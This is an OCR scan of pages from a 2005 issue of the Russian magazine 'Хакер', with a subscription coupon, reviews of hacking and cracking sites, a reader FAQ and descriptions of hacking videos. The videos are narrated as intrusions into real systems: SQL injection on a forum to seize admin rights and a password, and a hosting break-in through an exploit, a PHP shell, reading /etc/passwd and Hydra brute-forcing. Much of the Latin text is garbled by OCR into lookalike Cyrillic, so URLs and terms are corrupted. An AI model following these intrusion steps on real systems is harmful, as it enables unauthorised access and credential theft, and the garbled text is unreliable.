«Визбор Ю.И.», «Митяев О. Г.», «ЕМІ Мизіс РиЫізЫпд», «5ВА Мизіс РиЫізМіпд», © Мегалайнер, © ЗАО «Си Ди Лэнд+»/ 
СО І_апс1 Ресогсіз, ЗАО «ШнурОК», © Разриііп СІиЬ, ООО «Русские Мобильные Развлечения». Все права защищены, 
торговые знаки являются собственностью их владельцев. 

Лицензия №33353 в ьща на Федеральной службой по надзору в сфере связи 



I 













840р 


ЗА 6 МЕСЯЦЕВ 


990р 


ЗА 6 МЕСЯЦЕВ 


1830р 


ЗА 6 МЕСЯЦЕВ 


1620р 


ЗА 12 МЕСЯЦЕВ 


1920р 


ЗА 12 МЕСЯЦЕВ 


ЗбООр 


ЗА 12 МЕСЯЦЕВ 



Как оформить заказ? 

И Заполнить купон и квитанцию 
Ш Перечислить стоимость подписки через Сбербанк 
® Обязательно прислать в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 

м по электронной почте: зиЬзсгіЬе@дІс.ги; 

ьз по факсу: 780.88.24; 

по адресу: 107031, Москва, Дмитровский переулок, д. 4, 

строение 2, ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 



Подписка 

для юридических лиц 

Москва: ООО "Интер-Почта", 
тел.: 500-00-60, е-таіі: іпІег-розі@зоѵіпіеІ.ги 
Регионы: ООО "Корпоративная почта", 
тел.: 953-92-02, е-плаіі: крр@зоѵіп1еІ.ги 
Для получения счета на оплату подпис- 
ки нужно прислать заявку с названием 
журнала, периодом подписки, банковс- 
кими реквизитами, юридическим и поч- 
товым адресом, телефоном и фамили- 
ей ответственного лица за подписку. 
ѵѵѵѵѵѵ.іпіегрос^а.ги 



во подписка оформляется в день обработки купона и квитанции. I 

80 купоны, отправленные по факсу или электронной почте, обрабатываются в течение 5 рабочих дней. 
»о купоны, отправленные почтой на адрес редакции обрабатываются в течение 20 дней. 



РЕКОМЕНДУЕМ ИСПОЛЬЗОВАТЬ ЭЛЕКТРОННУЮ ПОЧТУ ИЛИ ФАКС. 



Подписка производится с номера, выходящего через один календарный месяц после оплаты. 

Например, если произвести оплату в сентябре, то подписку можено оформить с ноября. 

ПО ВСЕМ ВОПРОСАМ, СВЯЗАННЫМ С ПОДПИСКОЙ, ЗВОНИТЕ ПО БЕСПЛАТНЫМ ТЕЛЕФОНАМ: 
935 - 70-34 (ДЛЯ МОСКВИЧЕЙ) И 8 - 800 - 200 - 3-999 (ДЛЯ РЕГИОНОВ И АБОНЕНТОВ МТС, БИЛАЙН, 
МЕГАФОН). ВСЕ ВОПРОСЫ ПО ПОДПИСКЕ МОЖНО ПРИСЫЛАТЬ НА АДРЕС: ІМРОѲОІС.ПУ 









с^г: 

ПОДПИСНОЙ КУПОН 

Прошу оформить подписку: 

□ на журнал Хакер + 2 СО 
I | на журнал Хакер + йѴй 

на комплект Хакер +2 СО и Хакер Спец + СО 
на комплект Хакер+ ОѴО и Хакер Спец + СО 

на □ месяцев 

начиная с 2005 г. 

і— I Доставлять журнал по почте 
1 — 1 на домашний адрес 
і— I Доставлять журнал курьером на 
* адрес офиса (по г. Москве) 

Подробнее о курьерской доставке читайте ниже 
(отметьте квадрат выбранного варианта подписки) 

Ф.И.О. 



пп. пп. пп,. 

день месяц год 

АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



№ 



Извещение 


ИНН 7729410015 ООО «Гейм Лэнд» 


ЗАО Международный Московский Банк, 


г. Москва 




р/с № 40702810700010298407 




к/с № 30101810300000000545 




БИ К 044525545 


КПП -772901001 




Плательщик 




Адрес (с индексом) 




Назначение платежа 

Оплата за « » 

с 2005 г. 


Сумма 


Кассир 


месяц 

Ф.И.О. 


Подпись плательщика 






Квитанция 


ИНН 7729410015 ООО «Гейм Лэнд» 


ЗАО Международный Московский Банк, 


г. Москва 




р/с № 40702810700010298407 




к/с № 30101810300000000545 




БИК 044525545 


КПП -772901001 




Плательщик 




Адрес (с индексом) 




Назначение платежа 

Оплата за « » 

с 2005 г. 


Сумма 




Ф.И.О. 


Кассир 


Подпись плательщика 









30000 РУБЛЕЙ САМЫМ ОТВАЖНЫМ 

Бабло побеждает зло 



ПЕРВЫЙ ПРИЗ — 30000 РУБЛЕЙ 
ВТОРОЙ ПРИЗ — 17000 РУБЛЕЙ 
ТРЕТИЙ ПРИЗ — 13000 РУБЛЕЙ 




/ 




Все очень просто! Деньги может получить любой! Без обмана, уже с НДС и НСП, без налога 
на прибыль, с разрешением участвовать в игре всей семье, без ограничений по возрасту. 
Все что от тебя требуется — изобразить логотип Хакера на любой поверхности, 
от собственного лба до крыши Пентагона :).* 

Обязательно сделать фотку своего шедевра, и прислать ее нам в хорошем качестве 
(не менее 1024x768). Наши мега-дизайнеры влегкую пробьют фотомонтажи, т.ч. даже не парьтесь 
нас поиметь :). Акция начинается прямо сейчас, твори и фоткай. Свои фотки присылай на 
30000 @ геаі.хакер.ги. 



*Ахтунг! Эти два варианта уже исполнены нами и в конкурсе не участвуют. 



І Р 



[хакер 11 [83] 05 > ЮНИТЫ 140 ] 




Пи$81АЫ 

ВІ.АСКНАТ РгОіеСТ 

ІтНр : //ЬІаскИаШскги . пеТ 
Если ты крутой ВІаск Наі, то можешь получить 
крутой ззИ/зср шелл-аккаунт бесплатно и ис- 
пользовать его для любых черных дел. 
ВІаскНаІ Ргоіесі — это русский ипбедгоипсі-про- 
ект, где происходит обмен знаниями о сущест- 
вующих уязвимостях и методах их эксплуата- 
ции. Вот лишь некоторые характеристики пре- 
доставляемого шелла: 30 Мб диск, зоскз 4/5, 
компил эксплойтов. Доступны следующие при- 
ложения: Кр, ззН, ВіІсИХ, регі, рНп, ргохусИаіпз, 
Ііпкз, ѵѵдеі, Иубга, птар, пеісаі и пр. 




Кеѵегзе-Епдіпеегіпд 

Маіѵѵаге 

\ллллл/.2ѲІ1'5ег.сопп/геѵег5е-таІ\л/агѳ-рарег 
Данная страница посвящена довольно редкой 
теме — дизассемблированию и исследованию 
зловредного кода (вирусов, троянов, червей и 
т.п.). Рассказ ведет авторитетный спец из инс- 
титута 5АЫЗ — Пенни Зельтцер (І_еппу 




2еІІзег). Там же можно приобрести его книгу, 
написанную с соавтором: Маіѵѵаге: РідТіііпд 
Маіісіоиз Собе (скажу по секрету: эту книгу 
можно легко найти в электронном виде в Се- 
ти). Кроме того, Пенни ведет множество дру- 
гих курсов, о которых можно узнать на заглав- 
ной странице сайта ѵѵѵѵѵѵ.геіізег.сот. 

СІІВЕ 08 

ИНр://о$сІеѵ.ги 

Хохол по имени Олег решил заколбасить свою 
операционную систему. Что это будет за опе- 
рационка, ты узнаешь на его сайте. Здесь же 
отмечу самое важное: Олег собрал у себя на 
сайте просто ворох полезнейшей документа- 
ции, интересной многим, например: специфи- 




кация РСІ ВЮЗ, программирование серийного 
порта, концепции наноядра, программирова- 
ние РС-спикера, описание использования ѴРЗ 
под Ыпих'ом, описание технологии Нурег- 
ТИгеабіпд, написание простого драйвера для 
сетевой карты и т.д. 

Служба 

безопасности 

[тНр : //$Ь .асіѵегппап . сот 
Вообще-то, этот сайт не только об информа- 
ционной безопасности, но и о безопасности 
бизнеса, персональной безопасности, охран- 
ных услугах и системах, антитерроре, развед- 
ке и контрразведке, технике и технологиях, и 
пр. Куча интересной информации для спецов 
и начинающих! Вот лишь некоторые названия 
материалов: «Защита ОЗМ и как ее можно 
вскрыть», «Способы взлома почты», «Шпио- 
нские программы и новейшие методы защиты 
от них», «Как откосить от армии», «Как пить 
не пьянея» и т. д. 









Сате 

Наскіпд Ііпіѵегеііу 

\ллллллдНи.а$.го 

Крутой крэкерский сайт, специализирующий- 
ся на взломе игрушек. Хочешь узнать, как 
крэкнуть Оиаке2/3, ЗіагСгаК, Веаѵіз апсі 
ВиШіеасІ, Міпезѵѵеерег? Если да, то бегом на 
этот сайт за подробными туториалами. Судя 
по домену, проект принадлежит румынам, но 
почти вся информация представлена на анг- 
лийском. Игрушками сайт не ограничивается, 
имеется куча статей по другим крэкерским те- 
мам, а также тулзы, крэкмисы, ссылки и пр. 
Авторы не ограничиваются взломом только 
под ѴѴіп-платформой — не забыты и никсы. 




Кругом гаджеты 

Нйр://ді2то2.ги 

Еще несколько лет назад слово «гаджет» не 
было широко известно обычному обывателю, 
люди обходились без этих полезных в обиходе 
и призванных облегчить и приукрасить нашу с 
вами жизнь вещей. Хотя деревянные счеты и 
настольные лампы с часами и гордым назва- 




нием «Электроника-85» с очень большой на- 
тяжкой и можно назвать гаджетами прошлого. 
Сегодняшнее сверхбыстрое развитие техно- 
логий выплеснуло на рынок просто огромную 
кучу всевозможных полезных вещей. Сайт, 
регулярно обновляясь, постоянно публикует 
все новости из мира гаджетов. Производятся 
обзоры и тестирования появляющихся новых 
девайсов, сопровождаемые комментариями 
посетителей ресурса. Девиз сайта — расска- 
зать правдиво обо всех гаджетах, начиная с 
пылесоса для клавиатуры и заканчивая изЬ- 
диваном с функциями подогрева пиццы, трЗ 
плеером и ЭѴЭ. 

Роботы атакуют! 

\ллллл/.гоЬос 1 иЬ.ги 

Пока что развитие робототехники не движется 
вперед семимильными шагами. Вернее ска- 
зать, технологии создания роботов, конечно, 
развиваются и совершенствуются. Взять хотя 
бы, к примеру, такие военные разработки, как 




беспилотные самолеты и роботы-саперы, ко- 
торые могут совершать определенные 
действия без постоянного контроля и вмеша- 
тельства человека. Но для нас с вами знаком- 
ство с роботами, в классическом их понима- 
нии, происходит разве что с умной собачкой 
Айбо да боями роботов, транслируемых по те- 
левизору. Но не стоит отчаиваться, ресурс 
ѵѵѵѵѵѵ.гоЬосІиЬ.ги поможет нам ближе познако- 
миться с роботами и мировой робототехникой 
в целом. Это самый долгоживущий и обшир- 
ный сайт данной тематики в рунете. На нем 
полно информации, которая способна удов- 
летворить самого требовательного и искушен- 
ного пользователя. Клуб конструкторов, сооб- 
щества робототехников-любителей, панорам- 
ный обзор новостей по теме роботов, постоян- 
но обновляемый контент и еще куча всего ин- 
тересного зп 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ МНЕ ПОСЫ- 
ЛАТЬ ВОПРОСЫ, ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХА- 
КОМ/КРЭКОМ/ФРИКОМ — ДЛЯ ЭТОГО ЕСТЬ НАСК-РАО 
(НА СКРА О @ ИЕАІ .ХАКЕР ЛЦ ) , НЕ СТОИТ ТАКЖЕ ЗАДА- 
ВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТ НА 
КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МО- 
ЖЕШЬ НАЙТИ И САМ. Я НЕ ТЕЛЕПАТ, ПОЭТОМУ КОНК- 
РЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬ- 
ШЕ ИНФОРМАЦИИ. 
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О: Что такое ШАР и с чем его, собственно, едят? 

А: В любой почтовой программе есть адресная книга, и ты 
легко можешь написать сообщение любому из адресатов. 

Но что делать, если е-таіі'а нужного человека (скажем, 
коллеги по работе или одногруппника) в этой книге нет? 

В этом случае удобно было бы найти соответствующую за- 
пись в специальном справочнике, который можно центра- 
лизованно организовать с помощью технологии ШАР. 

ШАР (ЫдІпІѵѵеідПІ Эігесіогу Ассезз Ргоіосоі) — это протокол 
для доступа к службе каталогов. Он использует ТСР/ІР и 
позволяет производить операции аутентификации (ЬіпсІ), 
поиска (зеагсіі) и сравнения (сотраге), а также операции 
добавления, изменения или удаления записей. Возвраща- 
ясь к нашему примеру, клиент может подключиться к ШАР- 
серверу и выполнить запрос по поводу е-таіі'а нужного ему 
человека, и если соответствующая запись в базе данных 
присутствует, получить результат. 

ШАР-сервер индексирует все данные из записей и позволяет организо- 
вывать поиск с помощью специальных фильтров. Если переводить запро- 
сы на понятный язык, то получится что-то вроде: «Найти всех людей, ко- 
торые работают в издательстве ОатеІапсІ с 2003 года. Вернуть их ФИО и 
е-таіі адреса». Из этого примера должно быть ясно, что ШАР не ограни- 
чивается хранением одних лишь е-таіі и контактной информации в прин- 
ципе. Очень его используют для хранения сертификатов шифрования, па- 
ролей и другой технической информации. Как и любой протокол, ШАР не 
определяет, как должны работать серверные и клиентские программы. 
Но зато он определяет язык, на котором клиенты обращаются к серверу 
(впрочем, и сервер с сервером). В качестве клиентского приложения мо- 
жет быть и почтовая программа, а может система аутентификации и за- 
щиты. Сервер обычно принимает входящие соединения на 389 порт. Но 
если используется защищенное соединение (пакеты инкапсулируются в 
83І_), то для сервера обычно назначают порт с номером 636. 

Пару слов о структуре хранения данных. ШАР определяет так называе- 
мые разрешения, которые устанавливаются администратором, и позволя- 
ет конкретным людям обращаться к ШАР базе данных. Помимо этого, фи- 
гурирует такое понятие, как «схема». Его нужно воспринимать как формат 
описания данных и их атрибутов на сервере. К примеру, можно определить 
формат хранения данных о сотрудниках (ѵѵогкег), каждая запись которых 
будет содержать имя (ІізЦіате), фамилию (ІазЦіате) и е-таіі. 




О: По долгу службы мне часто приходится иметь дело с работой под вир- 
туальными машинами. В основном, работаю с ѴѴМѵѵаге, но местами ис- 
пользую и ѴігІиаІРС. Проблема актуальна для обоих программ и заключа- 
ется в том, что некоторые приложения каким-то образом определяют ис- 
пользование виртуальной машины и, как следствие, отказываются рабо- 
тать. Это в частности касается некоторых ботов, червей и т.п. В итоге я не 
могу запустить и проанализировать их. Расскажи, каким образом они де- 
тектят ѴѴМѵѵаге и как это можно обойти. 

А: Одним из способов детектировать использование ѴѴМѵѵаге — считать ин- 
формацию о биосе компьютера. Виртуальная машина использует свой 
собственный и очень специфичный биос, который никогда бы не стали ис- 
пользовать на обычном РС. Понимаешь, куда я клоню? Если считать инфор- 
мацию о биосе и проанализировать ее, то определить использование вирту- 
альной машине будет пустяковой задачей. Если ты внимательно читал 
статьи в «Кодинге», то, возможно, сможешь написать такую утилитку сам. 
В ответ на запрос об биосе ты получишь примерно следующую информацию: 
ВІ05 Оаіе: 10/16/01 
ВІ05 Зідпоп: ипкпоѵѵп 

ВІ05 Туре: РИоепіхВЮЗ 4.0 Веіеазе 6.0 ІісепзесІ Іо Іпіеі 
Зирег І/О: ипкпоѵѵп 
СИірзеі: ІпіеІ 440В ШХ геѵ 1 

Тип биоса РНоепіхВЮЗ выдает виртуальную машину с потрохами. Но по- 
мимо него есть и другие предатели. Во-первых, это специфическое обору- 
дование, которое использует ѴМѵѵаге: видеокарту ѴМѵѵаге Іпс [ѴМѵѵаге 
ЗѴОА II] РСІ Оізріау Абаріег, сетевую карту АбѵапсесІ Місго Оеѵісез [АМО] 
79с970 [РСпеІ 32 І_АЫСЕ] (геѵ 10), жесткие диски ѴМѵѵаге Ѵігіиаі ЮЕ Нагб 
Огіѵе (или ѴМѵѵаге ЗСЗІ СопІгоІІег). Во-вторых, МАС-адрес сетевой карты. 
И, в-третьих, специальная системная функция, намеренно оставленная 
разработчиками и предназначенная для определения ѴѴМѵѵаге. Однако за- 
маскировать виртуальную машину все-таки можно — для этого нужно вос- 
пользоваться специальным патчем для ѴѴМѵѵаге, который написал Козіуа 
КогІсПіпзку из французского проекта Нопеупек Патч ты сможешь закачать 
здесь — Ыір://Ііопеупеі.г5іа ск. огд/іооіз/ѵтраісіі .с. 




О: Есть несколько доменов, которые бы очень помогли мне в продвижении 
электронного бизнеса (неважно, какого). Срок их делегирования скоро за- 
канчивается, но владельцы уже несколько раз оплачивали обслуживание 
в последний момент. Я устал в ручную проверить их данные по ѵѵИоіз-базе. 
Возможно, существует сервис, который будет отслеживать доступность 
доменов за меня? 

А: Что же это за секретный бизнес такой, а? Подходящий сервис на самом 
деле есть — тѵѵѵ.рооі.сот. И предоставляет он намного больше возможнос- 
тей, которым ты непременно обрадуешься. Первая фишка — постоянный мо- 
ниторинг зарегистрированных доменов. Ты вносишь базу интересующие те- 
бя домены и включаешь постоянное слежение. Как только домен освободит- 
ся, то есть владелец не захочет или попросту забудет продлить облуживание 
домена, шш.рооісот мгновенно зарегистрирует его на тебя. Понятно, что 
на свой страх и риск сервис работать не будет. Перед использованием сер- 
виса тебе с помощью кредитки необходимо пополнить свой внутренний счет, 
который и будет использоваться для проплаты доменов. 



О: А существует ли такой ресурс, где можно посмотреть, 
как выглядели сайты несколько лет назад? Что-то вроде 
архива Интернета, который индексирует популярные сайты 
за несколько лет и позволяет просмотреть их содержимое 
индекса. Знакомый уверяет, что такой ресурс существует, 
но мне что-то слабо верится. Это же огромные объемы ин- 
формации, или я не прав? 

А: Представь себе, в 1996 году нашлись люди, которые взя- 
лись за эту, казалось бы, нереальную задачу и проиндекси- 
ровали весь Интернет. Результаты работы сервиса в абсо- 
лютно свободном виде доступны на сайте уѵеЬ.агсЫѵе.огд. 



О: Что такое МТІІ? 

А: МТІІ (Махітит Тгапзтіззіоп ІІпй) — это максимальный 
блок передачи данных, параметр который играет важную 
роль в локальных сетях. МТІІ определяет максимальный раз- 
мер ІР-пакета, который можно передавать через ІР-интер- 
фейс, не разбивая на меньшие части. То есть если значение 
МТІІ равно 1500 байт (это типичное его значение для 
ЕШегпеТсетей), а размер передаваемых данных равен 1600 
байт, то данные будут поделены на 2 ІР-пакета. Если бы их 
размер не превышал 1500, то все они были бы помещены в 
один пакет. Важно отметить, что на разных участках следова- 
ния ІР-пакета МТІІ может отличаться. Так, если пакет не был 
фрагментирован в момент отправки, он легко может быть по- 
делен на одно из узлов своего маршрута. 
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Нужно ли ввести ІІВІ_ интересующего тебя ресурса, после чего архив 
возвратит ссылки на внешний вид страниц ресурса за несколько лет. 
Я вот с удовольствием посмотрел на проекты, которыми с огромным 
чувством альтруизма занимался несколько лет назад. 

О: В каждой второй статье вы упоминаете сетевой сканер птар. Но ведь 
это уже довольно древний проект и давно не обновляется. Неужели не 
существует более нового средства? 

А: А кто тебе сказал, что птар не обновляется? Чушь! После продолжи- 
тельных перерывов автор всегда выкладывает новые версии. В последней 
версии — 3,93 — была значительно улучшена и оптимизирована функция 
АВР-сканирования, добавлена новая опция «--зрооЦпас», позволяющая 
задать произвольный МАО- адрес компьютера, с которого производится 
сканирование. Помимо этого, автор значительно расширил базу извест- 
ных сервисов и портов для распознавания сервисов, а также базу извест- 
ных отпечатков 05 — для идентификации удаленной оси. Так что птар по- 
прежнему является лучшим сетевым сканером с массой уникальных воз- 
можностей. Да и вообще плохого мы не советуем :). 

О: Намедни приобрел себе хороший смартфон и сейчас пытаюсь позна- 
комиться со всеми его возможностями. Очень хочется наладить комфо- 
ртный просмотр видео, но для этого каким-то образом нужно уменьшить 
объемные видеофайлы с фильмами. Не вижу смысла возиться со слож- 
ными видеоредакторами — есть способ проще? 

А: В этой ситуации тебе наверняка придется по душе небольшая, но очень 
полезная программа РоскеЮіѵХЕпсосІег ( сііѵх.ррссооі.сот ). Фишка утили- 
ты заключается в том, что она позволяет без лишних заморочек подгото- 
вить видео для последующего воспроизведения на мобильных устрой- 
ствах. Все, что от тебя требуется, — это выбрать конвертируемый файл и 
выставить параметры конечного видео. Во многом выбору необходимых 
параметров способствует сама программа, но неплохо и самому представ- 
лять что к чему. Начнем с разрешения. Понятно, что 800x600 в данном слу- 
чае это непозволительная роскошь. Файлы с таким разрешением предназ- 
начены для просмотра на обычных компьютерах и поэтому весят никак не 
меньше 700 Мб. Едва ли ты сможешь уместить их на своей флешке. Да и 
ненужно это. Стандартные разрешения мобильных телефонов сегодня — 
это 176x220, 320x240, 640x480. Поэтому имеет смысл выбрать то разреше- 
ние видео, которое поддерживает твоя трубка. Простая логика. 

Помимо разрешения имеется еще два важных параметра — битрейт и ко- 
личество кадров в секунду. Битрейт — это количество бит, прошедшее че- 
рез преобразующее устройство (декодер) за единицу времени. Чем боль- 
ше битрейт (измеряется в кбит/с), тем более качественная картинка будет 
на выходе. Рекомендую несколько раз поэкспериментировать с этим пара- 
метром, чтобы выбрать для своего телефона оптимальное значение. Что 
касается количества кадров в секунду, то стандартным значением здесь 
является числа из диапазона от 24 до 29. Правда, для проигрывания видео 
на мобильных девайсах такие характеристики опять же не требуются, и 
этот параметр вполне можно снизить до 15 кадров/с. 

О: Недавно портировал под І_іпих простенькую ѴѴіпбоѵѵз-программу 
и с удивлением обнаружил, что КОЕ использует совершенно другой 
формат иконок. Вместо привычного ІСО файлы иконок хранятся в ХРМ. 
Что особенного в этом формате? 

А: ХРМ (X РіхМар) — это текстовый АЗСІІ-формат для хранение изображе- 
ний, который активно использует X ѴѴіпбоѵѵ. Любая картинка в формате 
ХРМ — это массив, описанный в синтаксисе АЫЗІ С. Лучшего объяснение, 
чем хороший пример, здесь найти трудно. 

/* ХРМ 7 

/* массив с информацией об изображении 7 
зіайс сИаг * гоипсІЬ_хрт[] = { 

Г ширина высота количество_цветов срр [х_ПоІ у_НоІ] 7 
"13 1352 77", 

Г каждая следующая строчка определят символ для отображения опреде- 
ленного цвета 7 
" з попет попес попе", 

". з ЮрЗПасІоѵѵСоІог т ѵѵИіІе с ІідІіШІие", 

"X з ісопСоіогі т Ыаск с Ыаск", 

"о з ЬоИотЗПасІоѵѵСоІог т Ыаск с #646464646464", 

"О з зеІесЮоІог т ѵѵЫІе с гесГ, 

Г расположение пикселей с помощью определенных ранее символовѴ 



" .ХХХХХХХо 

".ХХХХОХХХХо ", 
".ХХХОООХХХо ", 
".ХХХХОХХХХо ", 

" .ХХХХХХХо ", 

" .ХХХХХХХо 

" о о X X X о о ", 

" ооо ", 

м м 

}; 

Подробнее о формате можно прочитать на странице разработчиков — 
ЫфМоаІа.іІод.МеЬогз/хрт.ЫтІ 

О: Каким образом можно отключить скрытые расшаренные ресурсы в 
ѴѴіпбоѵѵз? 

А: В операционных система ѴѴіпбоѵѵз 2000/ХР/2003 помимо открытых се- 
тевых ресурсов, созданных пользователем, существуют так называе- 
мые скрытые шары АОМІЫ$, ІРС$, С$, Б$ и т.д., предназначенные для 
администратора. Они не отображаются в «Сетевом окружении», но к 
ним можно обратиться через ІІІЧС-адрес (\\имя_компьютера\имя_скры- 
той_шары$), имя права администратора. По большому счету, опасности 
они не представляют, поскольку завладеть учетной записью админист- 
ратора на удаленной машине довольно сложно. Но при желании их все- 
таки можно отключить. Для этого найди в реестре опцию АиІоЗНагеѴѴкз 
(НКЕѴ_І_ОСАІ__МАСНІМЕ\5Ѵ5ТЕМ\СигтепЮопігоІ5еі\5егѵісез\Іап- 
тапзегѵег\рагатеІегз) или, как это будет в случае ѴѴіпсІоѵѵз 2000, 
АиІоЗНагеЗегѵег, после чего установи ее значение в ноль. 

Что касается системной шары ІРС$, то ее можно отключить только че- 
рез командную строку: пеі зПаге ІРС$ /беіеіе. Но делать это нужно толь- 
ко в том случае, если ты хочешь лишить удаленных пользователей вся- 
кой возможности подключиться к твоему компьютеру. 

О: Как осуществляется аутентификация в ѲЗМ-сетях? 

А: С помощью ЗІМ-карты. Она содержит не номер телефона с РІЫ-ом, 
как считают многие, а специальные идентификационные данные або- 
нента, которые необходимы для авторизации в сети. Процесс иденти- 
фикации начинается с ввода пользователем РІЫ-кода. Далее телефон 
устанавливает связь с ближайшей базовой станцией оператора связи 
и в зашифрованном виде передает ей так называемый ІМЗІ-код 
(Іпіегпаііопаі МоЬіІе ЗиЬзсгіЬег ІбепШу — Международный Идентифи- 
катор Мобильного Абонента). Этот код уникален для каждой конкрет- 
ной ЗІМ-ки и не может повторяться. Оператор пробивает ІМ5І по сво- 
ей базе и, в случае совпадения (такой абонент действительно сущест- 
вует), отправляет мобильной станции 128-разрядное случайное число 
(так называемое ВАІ\Ю). На телефоне это число шифруется с по- 
мощью алгоритма АЗ и Кі-ключа, который хранится на ЗІМ-карте, пос- 
ле чего результат (так называемый ВВЕЗ) отправляется обратно опе- 
ратору. В базе оператора, помимо ІМ8І, хранятся и соответствующие 
им Кі-коды, поэтому он легко выполняет аналогичные действия. И ес- 
ли результат вычислений идентичен 5ВЕ5, полученному от абонента, 
аутентификация считается успешной. 

Замечу, что Кі-код по радиоканалу не передается в принципе и, та- 
ким образом, не может быть перехвачен. Единственный способ им 
завладеть — считать из ЗІМ-карты, но это тоже непростая задача. 
ІМ8І, Кі- и Кс-коды хранятся на ЗІМ-карте в зашифрованном виде. И 
если с ІМЗІ-кодом все довольно просто, так как он недостаточно за- 
щищен и легко поддается взлому, то с Кі-кодом все не так гладко. 
Извлечь его из ЗІМ-карты намного сложнее, так как его защиту 
обеспечивает продуманный криптографический алгоритм СОМР. 
Выделяют три версии этого алгоритма. СОМР 128 ѵ.1 используется 
большинством операторов, СОМР 128 ѵ.2 в обиходе у «Мегафона» и 
нескольких региональных операторов, СОМР 128 ѵ.З недавно был 
одобрен, но пока не получил распространение в России. Взлому 
поддается только первая версия алгоритма (подробнее читай в #10 
спец, выпуске X). Известных подходов к взлому второй и третьей 
версии не существует до сих пор. Даже теоретических. 
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СМЕНИТЬ ИГРУ? 



* Огромный 
выбор компью- 
терный игр 



* Игры для всех 
телевизионных 
приставок 



* Коллекционные 
фигурки из 



і/ѴагСгаЙ III 
Асііоп Гідиге: 



$42 - 99 Тісопсіі из 
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(095) 928-3574 
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Описание видео: 

Взлом ІсІеаІВВ на примере 
Іогит.хакер.ги I ІЧіІгех 
В этом видеоролике хакер показывает весьма 
интересную уязвимость — ЗОІ_ Іпіесііоп в фору- 
ме ІсІеаІВВ. В качестве примера выступает фо- 
рум всеми любимого журнала Хакер 
{іогит. хакер. ш). 

Сначала хакер логинится под своим аккаунтом 
и заходит в свой профайл. Подставив кавычку 
в переменную $рѵІРоІІ\Іо, он получает ошибку в 
синтаксисе ЗОІ_-запроса, после чего пробует 
выполнить простейший ЗОІ_-запрос — "зеіесі 
піііі". Запрос успешно выполняется. 

Открыв сорцы форума, хакер узнает имена 
всех полей в таблице "МетЬегз". Для начала 
хакер делает себя администратором на фору- 
ме, изменив значение "М_І_еѵеГ в таблице 
МетЬегз. Оно отвечает за статус пользователя 
и может принимать одно из трех значений: 1 — 
обычный пользователь, 2 — модератор, 3 — 
администратор. Не постеснявшись, злоумыш- 
ленник сразу становится админом. 

Теперь сетевой негодник хочет узнать пароль 
пользователя "ЬООЫік" :). Для этого он состав- 





■ ■■ ■■■ ч к 

іи лиягиит 

ляет нехитрый запрос и вставляет в свою под- 
пись. Посетив страницу с параметрами своего 
профайла, он увидел заветный пароль и с его 
помощью успешно залогинился на форуме. 

Описание видео: 

Взлом хостинга: часть вторая I зазЫкз 
В этот раз под прицелом оказалась уже вторая 
хостерская машина, и задача компьютерного 
хулигана заключается в том, чтобы получить 
несколько пользовательских аккаунтов. "Кря- 
кер инета" N30 нашел бажный форум, однако, 
выполнять команды через известную дыру не 
получалось — в настройках сервера была 
включена опция РНР_5АРЕ_МСЮ. По этой при- 
чине наш герой пытается взломать борду ста- 
рым эксплоитом для асІтіп_зІуІез.рЬр. Как ни 
странно, у него это выходит, и отмычка выдает 
заветную страничку с возможностью выполне- 
ния РНР-кода в еѵаІ(). Работать вручную черес- 
чур кропотливо и неудобно. Чтобы ускорить 
процесс проникновения, хакер подключает 
ВЗТ-шелл (замечу, однако, что авторизация в 
нем должна быть отключена). Получил в свое 
распоряжение кое-какой доступ, не медля ни 
секунды, хакер начинает исследовать содер- 
жимое каталогов. Как я уже сказал, РНР-инте- 
рпретатор переведен в безопасный режим 
(заіе-тосіе), поэтому выполнить команды не 
получиться. Чтобы получить хоть какой-то 
шанс добыть желанные аккаунты, наш герой 
пытается разными методами прочесть /еіс/разз- 
ѵѵсі и выудить юзерские логины, но и это оказа- 
лось не такой уж и простой задачей... В процес- 
се изучения директорий обнаруживается любо- 
пытная папочка «зПор» — похоже, что на сайте 
крутиться небольшой онлайн-магазин. Чтобы 
порулить админкой е-шопа, нужно знать логин 
и пасс дядьки админа. Само собой и то, и дру- 
гое хакер без проблем находит в незаметном, 
на первый взгляд, файле рИр.іпі. С помощью 
полученных данных он влезает в панель управ- 
ления «Сельмагом» и... уже по традиции не на- 
ходит там ровным счетом ничего полезного. 
Впрочем, надежда получить доступ к файлу с 




системными логинами еще есть! Для чтения 
файлов в безопасном режиме был написан 
специальный скрипт на РНР, который работает 
с МуЗОІ_ и считывает нужный файл. Главное 
условие — иметь в распоряжении доступ к БД, 
который, как я уже сказал, был ранее получен. 
Хакер транспортирует за!е_тосІе.рІір (именно 
так назван скрипт) с зесигііу.ппоѵ.ги и меняет 
стандартные значения важных параметров, 
после чего заливает сценарий на хост. Вуаля! 
Файлик с учетными записями легко оказывает- 
ся в наших лапах. 

Теперь самое время подумать об организации 
брутфорса. Главный герой подключается к 
шеллу и отдает известному брутеру Нубга ко- 
манду «фас», подразнив ее только что добы- 
тым файлом раззѵѵсі. К несчастью, РигеРТР, ус- 
тановленный у хостера, ни в какую не выносит 
"пицот" попыток логина с одного адреса и по- 
сылает взломщика лесом :). Чтобы исправить 
сложившуюся ситуацию нужно изменить коли- 
чество одновременно запущенных потоков до 
1, то есть в принципе отключить многопоточ- 
ность. После этих довольно-таки нехитрых ма- 
нипуляций герой буквально через пару минут 
подбирает пароли к нескольким аккаунтам. 
Міззіоп АссотрІізІіесІ ;) © 
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ѴѴІМЭОѴѴЗ 

РЕУЕЮРМЕЫТ 

АсІіѵеРуІііоп 2.4.1.247 

АЗРаск 2.12 

А5Рго1ес11.23 

АЗРгоІесІЗКЕ Ргее ТгіаІ 

Ргеатѵѵеаѵег 8 

НіТесІіѴпЗой Есіііріиз Рог МЕТ 
І\ІиІІзой ІпзІаІІ Зузіет (N313) 
ОІІуРЬд 1.10 

ІІМХ 

ОЕѴЕЮРМЕЫТ 

